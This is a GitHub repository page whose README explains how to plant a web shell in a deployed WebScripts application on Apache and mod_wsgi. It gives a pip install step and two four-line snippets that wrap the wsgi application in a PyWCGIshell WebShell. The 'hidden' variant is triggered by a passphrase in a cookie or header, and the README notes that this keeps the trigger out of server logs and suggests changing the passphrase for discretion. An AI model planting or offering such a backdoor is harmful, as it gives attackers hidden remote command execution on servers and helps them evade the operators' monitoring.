Skip to content

mauricelambert/WebScriptsWebShell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
DefaultWebShell.PNG
DefaultWebShell.PNG
 
 
HiddenWebShell.PNG
HiddenWebShell.PNG
 
 
README.md
README.md
 
 
wsgi.py
wsgi.py
 
 
wsgi_default.py
wsgi_default.py
 
 

Repository files navigation

WebScripts WebShell

Description

Install a WebShell on hardened and deployed WebScripts (using Apache and mod_wsgi).

WebShell on WebScripts - Youtube

WebShell on WebScripts - Youtube

Steps

Install

Install requirements in virtualenv:

pip install PyWCGIshell

Write code

Add 4 lines to the end of the wsgi.py file.

Default WebShell

from PyWCGIshell import WebShell
webshell = WebShell(type_="wsgi")
webshell.standard_page = application
application = webshell.run
  • To use the WebShell add ?$HELL to the end of the URL
  • The $HELL in the query string is visible in the logs, i do not recommend using the default WebShell configuration.

Hidden WebShell

from PyWCGIshell import WebShell
webshell = WebShell(type_="wsgi", passphrase="azerty", pass_type="header_value")
webshell.standard_page = application
application = webshell.run
  • To use the WebShell add azerty in a header value (for example in a cookie, in the javascript console: document.cookie="azerty") and reload the page
  • The value of the cookie is not visible in the logs
  • You should change the passphrase for more discretion

About

Install a WebShell on hardened and deployed WebScripts (using Apache and mod_wsgi).

Topics

exploit apache wsgi webshell webscripts web-attacks

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages